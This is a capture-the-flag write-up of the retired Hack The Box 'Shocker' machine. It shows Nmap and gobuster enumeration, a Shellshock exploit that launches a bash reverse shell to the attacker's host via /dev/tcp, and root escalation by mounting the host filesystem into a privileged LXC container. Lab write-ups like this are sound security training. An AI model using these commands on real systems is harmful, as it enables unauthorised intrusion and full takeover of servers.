Hack The Box Shocker Writeup

Published:
September 17, 2024

This is a writeup for the retired Hack The Box Shocker machine.

Solution Summary

The machine is vulnerable to the Shellshock bug exposed through a script in the /cgi-bin/ folder in its Apache HTTP server installation. After gaining access through a reverse shell launched through the Shellshock bug, the user flag can be read out.

The root file system can be mounted by the local user inside an LXC container, since they are in the lxd group. With the root file system exposed, the root flag can be read out.

Solution

To complete the machine, the following steps were performed:

  1. Run Nmap and identify any potential vulnerabilities.
  2. Find exposed script files in /cgi-bin/.
  3. Use the Shellshock vulnerability to launch reverse shell.
  4. Retrieve the user flag
  5. Escalate to root privileges using an LXC root file system container bind.

Nmap

We run Nmap and try to identify vulnerabilities.

nmap -oX machines/shocker/nmap.xl -sV -sC --script vuln -A 10.10.10.56

Nmap returns the following (abbreviated) results:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-17 07:15 JST
Nmap scan report for 10.10.10.56
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| vulners:
|   cpe:/a:apache:http_server:2.4.18:
[...]
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| vulners:
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 349.44 seconds

Findings:

There are many identified vulnerabilities, but none of those identified have low attack complexity.

HTTP Server

Website served at http://10.10.10.56

Website served at http://10.10.10.56 Open in new tab (full image size 20 KiB)

Could “Shocker” be a pun on the Shellshock bug? In order to exploit the Shellshock vulnerability, we would have to have access to a vulnerable CGI script on the Apache HTTP server.

We run gobuster on the HTTP server:

gobuster dir --url http://10.10.10.56 \
  --wordlist=SecLists/Discovery/Web-Content/common.txt
gobuster dir --url http://10.10.10.56/cgi-bin/ -t 20 \
  --wordlist=SecLists/Discovery/Web-Content/common.txt -x "cgi,sh,pl,py"

For the second scan, we find an interesting file in the cgi-bin folder:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[...]
/user.sh              (Status: 200) [Size: 118]
[...]

Shellshock

We use Nmap again to evaluate /cgi-bin/user.sh for the Shellshock vulnerability, and try to spawn a reverse shell using the following snippet:

bash -i >& /dev/tcp/10.10.16.2/4444 0>&1 & disown

In a separate window, we listen for incoming connections with nc -lvp 4444 and run the following Nmap command:

nmap --script http-shellshock -p80 10.10.10.56 \
  --script-args uri=/cgi-bin/user.sh,cmd="/bin/bash -i >& /dev/tcp/10.10.16.2/4444 0>&1 & disown"

Nmap shows us the following (abbreviated) result:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-17 09:44 JST
Nmap scan report for 10.10.10.56
Host is up (0.10s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|
|     Disclosure date: 2014-09-24
|     Exploit results:
[...]
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|       http://seclists.org/oss-sec/2014/q3/685
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds

The reverse shell attaches to our machine:

Connection from 10.10.10.56:43486
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$

Screenshot of reverse shell spawned

Screenshot of reverse shell spawned Open in new tab (full image size 10 KiB)

We run the enumerate script from Valentine and store the results in machines/shocker/enumerate.log:

# Adjust it so that it is piped into bash instead
echo '
set -o pipefail
sedscript="1h;1s/./=/gp;x;1p;x;1p"
function run ()
{
        echo "BEGIN $1" | sed -n "$sedscript"
        if $1 |& cat; then
                echo "END $1" | sed -n "$sedscript"
        else
                echo "FAIL $1" | sed -n "$sedscript"
        fi
}
commands=("uname -a"
"whoami"
"hostname"
"cat /etc/os-release"
"lspci -nn"
"lscpu"
"systemctl status"
"ps aux"
"ip link show"
"ip address show"
"ip route show"
"cat /etc/passwd"
"cat /etc/group"
"iptables --list"
"ss -tl")
for command in "${commands[@]}"; do
        run "$command"
done
' | bash

Here are some highlights from the enumeration log:

=========================
BEGIN cat /etc/os-release
=========================
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
[...]

It looks like our current user shelly might be able to spawn containers with LXC:

====================
BEGIN cat /etc/group
====================
[...]
lxd:x:110:shelly
[...]

User flag

First though, we get the user flag:

shelly@Shocker:/usr/lib/cgi-bin$ cd /home/shelly
cd /home/shelly
shelly@Shocker:/home/shelly$ ls
ls
user.txt
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

LXC

We try to launch an LXC container and expose the root file system.

Since we can’t connect to the internet directly from the machine, we have to host it ourselves and serve it using a Python HTTP server.

First, we download the latest Alpine Linux images from https://images.lxd.canonical.com:

wget  --directory-prefix=machines/shocker/alpine \
  https://images.lxd.canonical.com/images/alpine/3.20/amd64/default/20240917_0017/{lxd.tar.xz,rootfs.squashfs}

We make an HTTP server in the newly created machines/shocker/alpine folder and remember to open the 8080 TCP port on our machine:

python -m http.server \
  --directory machines/shocker/alpine \
  --bind 10.10.16.2 8080

On our machine, we can then download the files into the current directory:

curl -O http://10.10.16.2:8080/lxd.tar.xz \
    -O http://10.10.16.2:8080/rootfs.squashfs

We then import the images into LXD:

lxc image import $PWD/{lxd.tar.xz,rootfs.squashfs}

The image import completes successfully and we see the following message:

Image imported with fingerprint:
ccaeb52f5433c84653bbfcf2229ea1bd34c6b66afd75a2d3b4e545ec7b60cac6

We run the container using the above fingerprint and spawn a shell:

lxc init ccaeb52f5433c84653bbfcf2229ea1bd34c6b66afd75a2d3b4e545ec7b60cac6 \
    pwnage --config security.privileged=true
lxc config device add pwnage host-root disk \
    source=/ path=/mnt/root recursive=true
lxc start pwnage
# /bin/bash not available
lxc exec pwnage /bin/sh

Inside the root shell, we run

ls /mnt/root/root
root.txt
cat /mnt/root/root/root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And we have the flag.

I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.

Back to Index